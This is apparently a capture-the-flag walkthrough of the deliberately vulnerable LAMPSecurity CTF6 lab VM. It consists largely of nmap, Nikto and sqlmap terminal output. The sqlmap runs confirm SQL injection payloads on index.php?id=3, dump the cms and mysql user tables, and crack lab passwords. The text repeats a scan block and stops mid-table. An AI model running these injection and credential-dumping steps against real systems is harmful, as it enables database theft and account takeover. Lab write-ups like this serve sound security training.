LAMPSECURITY: CTF6
- 参考博客:
- https://blog.csdn.net/weixin_42652002/article/details/112132466?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-2.nonecase
About Release
- Name: LAMPSecurity: CTF6
- Date release: 29 Jun 2009
- Author: madirish2600
- Series: LAMPSecurity
- Web page: http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/CTF6/
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions for “protecting yourself and your network. If you understand the risks, please download!
- ctf6.zip (Size: 425 MB)
- Download: http://sourceforge.net/projects/lampsecurity/files/CaptureTheFlag/CTF6/lampsecurity_ctf6.zip/download
- Download (Mirror): https://download.vulnhub.com/lampsecurity/ctf6.zip
- Download (Torrent): https://download.vulnhub.com/lampsecurity/ctf6.zip.torrent
┌──(root💀kwkl)-[~]
└─# nmap -n 172.16.70.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 23:00 HKT
┌──(root💀kwkl)-[~]
└─# nmap -n 172.16.70.0/24 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 23:00 HKT
Nmap scan report for 172.16.70.1
Host is up (0.00020s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
49158/tcp open unknown
49161/tcp open unknown
MAC Address: 00:50:56:C0:00:05 (VMware)
Nmap scan report for 172.16.70.2
Host is up (0.000059s latency).
All 1000 scanned ports on 172.16.70.2 are closed
MAC Address: 00:50:56:EE:4E:08 (VMware)
Nmap scan report for 172.16.70.141
Host is up (0.0014s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
143/tcp open imap
443/tcp open https
700/tcp open epp
993/tcp open imaps
995/tcp open pop3s
3306/tcp open mysql
MAC Address: 00:0C:29:64:07:10 (VMware)
Nmap scan report for 172.16.70.254
Host is up (0.00015s latency).
All 1000 scanned ports on 172.16.70.254 are filtered
MAC Address: 00:50:56:E0:03:82 (VMware)
Nmap scan report for 172.16.70.122
Host is up (0.0000030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
3000/tcp open ppp
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.92 seconds
┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.70.141
+ Target Hostname: 172.16.70.141
+ Target Port: 80
+ Start Time: 2021-11-28 23:11:09 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.2.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
+ Cookie PHPSESSID created without the httponly flag
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting.
+ OSVDB-3268: /files/: Directory indexing found.
+ OSVDB-3092: /files/: This might be interesting.
+ OSVDB-3268: /lib/: Directory indexing found.
+ OSVDB-3092: /lib/: This might be interesting.
+ Cookie roundcube_sessid created without the httponly flag
+ OSVDB-3092: /mail/: This might be interesting.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /sql/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3268: /docs/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 9068 requests: 0 error(s) and 31 item(s) reported on remote host
+ End Time: 2021-11-28 23:11:31 (GMT8) (22 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' 1 ⨯
___
__H__
___ ___[)]_____ ___ ___ {1.5.10#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:13:49 /2021-11-28/
[23:13:49] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=luip1tdpjrs...vh3skavum1'). Do you want to use those [Y/n] y
[23:13:51] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:13:51] [INFO] testing if the target URL content is stable
[23:13:51] [INFO] target URL content is stable
[23:13:51] [INFO] testing if GET parameter 'id' is dynamic
[23:13:51] [INFO] GET parameter 'id' appears to be dynamic
[23:13:51] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable
[23:13:51] [INFO] testing for SQL injection on GET parameter 'id'
[23:13:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:13:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="eu")
[23:13:51] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[23:13:55] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[23:13:55] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[23:13:55] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[23:13:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[23:13:55] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[23:13:55] [INFO] testing 'Generic inline queries'
[23:13:55] [INFO] testing 'MySQL inline queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[23:13:55] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[23:13:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[23:14:16] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[23:14:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[23:14:16] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[23:14:16] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:14:16] [INFO] target URL appears to have 7 columns in query
[23:14:16] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:14:18 /2021-11-28/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.5.10#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:14:40 /2021-11-28/
[23:14:40] [INFO] resuming back-end DBMS 'mysql'
[23:14:40] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=2dkoho3oivq...usctg4idj6'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:41] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test
[23:14:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:14:41 /2021-11-28/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --current-user
___
__H__
___ ___[']_____ ___ ___ {1.5.10#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:14:52 /2021-11-28/
[23:14:52] [INFO] resuming back-end DBMS 'mysql'
[23:14:52] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=nv6jhhpdpmi...lkt0s8psd3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP 5.2.6, PHP, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:54] [INFO] fetching current user
current user: 'cms_user@%'
[23:14:54] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:14:54 /2021-11-28/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' --dbs
___
__H__
___ ___[']_____ ___ ___ {1.5.10#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:15:05 /2021-11-28/
[23:15:06] [INFO] resuming back-end DBMS 'mysql'
[23:15:06] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=5rdcvb0dsaa...0u6s67uu64'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, Apache 2.2.3, PHP 5.2.6
back-end DBMS: MySQL >= 5.0.12
[23:15:07] [INFO] fetching database names
available databases [5]:
[*] cms
[*] information_schema
[*] mysql
[*] roundcube
[*] test
[23:15:07] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:15:07 /2021-11-28/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms --tables
___
__H__
___ ___["]_____ ___ ___ {1.5.10#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:15:19 /2021-11-28/
[23:15:19] [INFO] resuming back-end DBMS 'mysql'
[23:15:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=0bgn1a9gu9h...nea1pq36c1'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, Apache 2.2.3, PHP 5.2.6
back-end DBMS: MySQL >= 5.0.12
[23:15:20] [INFO] fetching tables for database: 'cms'
Database: cms
[3 tables]
+-------+
| log |
| user |
| event |
+-------+
[23:15:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:15:20 /2021-11-28/
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D cms -T user --dump
___
__H__
___ ___[(]_____ ___ ___ {1.5.10#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:15:30 /2021-11-28/
[23:15:31] [INFO] resuming back-end DBMS 'mysql'
[23:15:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rnldshdj80n...8pkgcdsae5'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:15:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:15:32] [INFO] fetching columns for table 'user' in database 'cms'
[23:15:32] [INFO] fetching entries for table 'user' in database 'cms'
[23:15:32] [INFO] recognized possible password hashes in column 'user_password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:15:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap6gg64mtg25376/sqlmaphashes-57ixoe7m.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:15:34] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
1
[23:15:37] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:15:38] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[23:15:38] [INFO] starting 12 processes
[23:15:39] [INFO] cracked password 'adminpass' for hash '25e4ee4e9229397b6b17776bfceaf8e7'
Database: cms
Table: user
[1 entry]
+---------+----------------------------------------------+---------------+
| user_id | user_password | user_username |
+---------+----------------------------------------------+---------------+
| 1 | 25e4ee4e9229397b6b17776bfceaf8e7 (adminpass) | admin |
+---------+----------------------------------------------+---------------+
[23:15:43] [INFO] table 'cms.`user`' dumped to CSV file '/root/.local/share/sqlmap/output/172.16.70.141/dump/cms/user.csv'
[23:15:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/172.16.70.141'
[*] ending @ 23:15:43 /2021-11-28/
┌──(root💀kwkl)-[~]
└─#
┌──(root💀kwkl)-[~]
└─# /opt/nikto-master/program/nikto.pl -host 172.16.70.141
- Nikto v2.1.6
- Target IP: 172.16.70.141
- Target Hostname: 172.16.70.141
- Target Port: 80
- Start Time: 2021-11-28 23:11:09 (GMT8)
- Server: Apache/2.2.3 (CentOS)
- Retrieved x-powered-by header: PHP/5.2.6
- The anti-clickjacking X-Frame-Options header is not present.
- The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type.
- Cookie PHPSESSID created without the httponly flag
- Apache/2.2.3 appears to be outdated (current is at least Apache/2.4.46). Apache 2.2.34 is the EOL for the 2.x branch.
- Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
- Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
- OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
- OSVDB-3268: /css/: Directory indexing found.
- OSVDB-3092: /css/: This might be interesting.
- OSVDB-3268: /files/: Directory indexing found.
- OSVDB-3092: /files/: This might be interesting.
- OSVDB-3268: /lib/: Directory indexing found.
- OSVDB-3092: /lib/: This might be interesting.
- Cookie roundcube_sessid created without the httponly flag
- OSVDB-3092: /mail/: This might be interesting.
- OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- Server may leak inodes via ETags, header found with file /phpmyadmin/ChangeLog, inode: 97164, size: 35791, mtime: Thu Oct 20 05:47:44 2095
- OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- OSVDB-3268: /sql/: Directory indexing found.
- OSVDB-3092: /manual/: Web server manual found.
- OSVDB-3268: /icons/: Directory indexing found.
- OSVDB-3268: /manual/images/: Directory indexing found.
- OSVDB-3268: /docs/: Directory indexing found.
- OSVDB-3233: /icons/README: Apache default file found.
- /phpmyadmin/: phpMyAdmin directory found
- OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
- 9068 requests: 0 error(s) and 31 item(s) reported on remote host
- End Time: 2021-11-28 23:11:31 (GMT8) (22 seconds)
- 1 host(s) tested
┌──(root💀kwkl)-[~]
└─# sqlmap -u 'http://172.16.70.141/index.php?id=3' -D mysql -T user --dump
___
__H__
___ ___[']_____ ___ ___ {1.5.10#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:14:31 /2021-11-29/
[23:14:31] [INFO] resuming back-end DBMS 'mysql'
[23:14:31] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=8k7s0c8hh8h...9e6a2c7va3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 9068=9068
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=3 AND (SELECT 1514 FROM (SELECT(SLEEP(5)))zENA)
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: id=3 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7171,0x644c49467875614873585a5669644f7a74445a417779496e72634a56474474595a6e437542477350,0x716a6b6271)-- -
---
[23:14:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: PHP, PHP 5.2.6, Apache 2.2.3
back-end DBMS: MySQL >= 5.0.12
[23:14:32] [INFO] fetching columns for table 'user' in database 'mysql'
[23:14:32] [INFO] fetching entries for table 'user' in database 'mysql'
[23:14:32] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[23:14:33] [INFO] writing hashes to a temporary file '/tmp/sqlmap7u2kha6j27776/sqlmaphashes-yz42cvrf.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[23:14:34] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[23:14:35] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[23:14:37] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[23:14:37] [INFO] starting 12 processes
[23:14:41] [INFO] cracked password 'mysqlpass' for hash '6cbbdf9b35eb7db1'
[23:14:44] [INFO] using suffix '1'
[23:14:51] [INFO] using suffix '123'
[23:14:59] [INFO] using suffix '2'
[23:15:07] [INFO] using suffix '12'
[23:15:15] [INFO] using suffix '3'
[23:15:24] [INFO] using suffix '13'
[23:15:32] [INFO] using suffix '7'
[23:15:40] [INFO] using suffix '11'
[23:15:47] [INFO] using suffix '5'
[23:15:55] [INFO] using suffix '22'
[23:16:03] [INFO] using suffix '23'
[23:16:10] [INFO] using suffix '01'
[23:16:18] [INFO] using suffix '4'
[23:16:26] [INFO] using suffix '07'
[23:16:34] [INFO] using suffix '21'
[23:16:42] [INFO] using suffix '14'
[23:16:50] [INFO] using suffix '10'
[23:16:58] [INFO] using suffix '06'
[23:17:06] [INFO] using suffix '08'
[23:17:13] [INFO] using suffix '8'
[23:17:21] [INFO] using suffix '15'
[23:17:29] [INFO] using suffix '69'
[23:17:36] [INFO] using suffix '16'
[23:17:44] [INFO] using suffix '6'
[23:17:51] [INFO] using suffix '18'
[23:17:59] [INFO] using suffix '!'
[23:18:07] [INFO] using suffix '.'
[23:18:14] [INFO] using suffix '*'
[23:18:22] [INFO] using suffix '!!'
[23:18:29] [INFO] using suffix '?'
[23:18:37] [INFO] using suffix ';'
[23:18:44] [INFO] using suffix '..'
[23:18:52] [INFO] using suffix '!!!'
[23:18:59] [INFO] using suffix ', '
[23:19:07] [INFO] using suffix '@'
Database: mysql
Table: user
[4 entries]
+-----------------------+----------+------------------------------+----------+-----------+-----------+------------+------------+------------+------------+------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+-------------+--------------+--------------+--------------+--------------+---------------+---------------+----------------+-----------------+-----------------+-----------------+------------------+------------------+------------------+------------------+--------------------+---------------------+----------------------+-----------------------+
